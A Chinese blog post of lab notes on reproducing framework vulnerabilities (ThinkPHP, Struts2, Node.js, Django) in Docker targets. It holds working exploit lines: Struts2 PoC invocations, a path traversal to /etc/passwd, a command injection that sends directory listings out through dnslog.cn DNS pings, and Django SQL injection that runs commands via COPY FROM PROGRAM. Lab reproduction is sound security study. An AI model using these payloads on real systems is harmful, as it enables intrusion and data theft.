当前位置: 首页 > news >正文

服务攻防-框架安全(漏洞复现)

news 来源:原创 2024/9/20 21:22:14

关闭靶场

sudo docker-compose down

运行此靶场

sudo docker-compose up -d

查看启动环境

sudo docker ps

运行dockers容器

docker exec -it 64052abd288b /bin/bash

thinkphp框架

thinkphp 2 - rce漏洞复现

docker exec -it 731dbae0e0b5 /bin/bash

集成化工具扫描

可以命令执行

thinkphp/5.0.23-rce

集成化工具利用

thinkphp/5-rce

直接梭哈

thinkphp/in-sqlinjection

Struts2

S2-009

梭哈

struts2 命令执行 (CVE-2016-3081)

直接梭哈

061rce和nc

python3 struts2-061-poc.py http://123.58.224.8:64423 "ls /tmp"

python2 S2-061-shell.py http://123.58.224.8:64423

S2-062

python3 s2-062.py --url http://123.58.224.8:25807 --cmd whoami

靶场无回显

Node.js

目录穿越

GET /static/../../../a/../../../../etc/passwd HTTP/1.1

CVE-2021-21315

Node.js库中的systeminformation软件包中存在一个命令注入漏洞(CVE-2021-21315

配合dnslog。Cn带外检测

/api/getServices?name[]=$(ping%20`ls%20/tmp`.5afckd.dnslog.cn)

Django

CVE-2019-14234

单引号已注入成功,SQL 语句报错:

/admin/vuln/collection/?detail__a%27b=123

创建 cmd_exec:

/admin/vuln/collection/?detail__title%27)%3d%271%27%20or%201%3d1%20%3bcreate%20table%20cmd_exec(cmd_output%20text)--%20

调用 cmd_exec 执行命令:

/admin/vuln/collection/?detail__title%27)%3d%271%27%20or%201%3d1%20%3bcopy%20cmd_exec%20FROM%20PROGRAM%20%27ping 37p5oe.dmp4tj.dnslog.cn%27--%20

/shiro-721

shiro-cve_2016_4437

solr

相关文章:

  • 北京网站建设多少钱?
  • 辽宁网页制作哪家好_网站建设
  • 高端品牌网站建设_汉中网站制作
  • 2024年7月23日(samba DNS)
  • MySQL8的备份方案——全量(完全)备份(CentOS)
  • 操作系统——笔记(1)
  • 驱动框架——CMSIS第一部分 RTE驱动框架介绍
  • 类和对象(四)
  • AV1技术学习:Quantization
  • centos系统mysql主从复制(一主一从)
  • 全国区块链职业技能大赛第九套区块链产品需求分析与方案设计
  • 腾讯云开发者《中国数据库前世今生》有奖创作季
  • Linux grep技巧 提取log中的json数据
  • MySQL第四次作业
  • Try ubuntu core (by quqi99)
  • leetcode日记(48)排列序列
  • Harmony Next -- 通用标题栏:高度自定义,可设置沉浸式状态,正常状态下为:左侧返回、居中标题,左中右均可自定义视图。
  • 「运费速查神器」精明买家必备!一键查询1688供应商发货费用
  • 【108天】Java——《Head First Java》笔记(第1-4章)
  • 4. 路由到控制器 - Laravel从零开始教程
  • React 快速上手 - 06 容器组件、展示组件、操作组件
  • VUE es6技巧写法(持续更新中~~~)
  • vue 配置sass、scss全局变量
  • 半理解系列--Promise的进化史
  • 番外篇1:在Windows环境下安装JDK
  • 那些被忽略的 JavaScript 数组方法细节
  • 前端面试题总结
  • 前端相关框架总和
  • 深入浅出webpack学习(1)--核心概念
  • 什么软件可以剪辑音乐?
  • 学习Vue.js的五个小例子
  • 怎样选择前端框架
  • 06-01 点餐小程序前台界面搭建
  • ​学习笔记——动态路由——IS-IS中间系统到中间系统(报文/TLV)​
  • ‌JavaScript 数据类型转换
  • #LLM入门|Prompt#3.3_存储_Memory
  • #Z2294. 打印树的直径
  • $$$$GB2312-80区位编码表$$$$
  • (1)虚拟机的安装与使用,linux系统安装
  • (11)MATLAB PCA+SVM 人脸识别
  • (C++二叉树05) 合并二叉树 二叉搜索树中的搜索 验证二叉搜索树
  • (javaweb)Http协议
  • (八)Flask之app.route装饰器函数的参数
  • (补充)IDEA项目结构
  • (二)七种元启发算法(DBO、LO、SWO、COA、LSO、KOA、GRO)求解无人机路径规划MATLAB
  • (二)正点原子I.MX6ULL u-boot移植
  • (附源码)ssm高校运动会管理系统 毕业设计 020419
  • (考研湖科大教书匠计算机网络)第一章概述-第五节1:计算机网络体系结构之分层思想和举例
  • (七)Java对象在Hibernate持久化层的状态
  • (四)c52学习之旅-流水LED灯
  • (学习总结16)C++模版2
  • .NET Core/Framework 创建委托以大幅度提高反射调用的性能
  • .NET:自动将请求参数绑定到ASPX、ASHX和MVC(菜鸟必看)
  • .NET精简框架的“无法找到资源程序集”异常释疑
  • .NET开源全面方便的第三方登录组件集合 - MrHuo.OAuth
  • .php文件都打不开,打不开php文件怎么办
  • /ThinkPHP/Library/Think/Storage/Driver/File.class.php  LINE: 48
  • @value 静态变量_Python彻底搞懂:变量、对象、赋值、引用、拷贝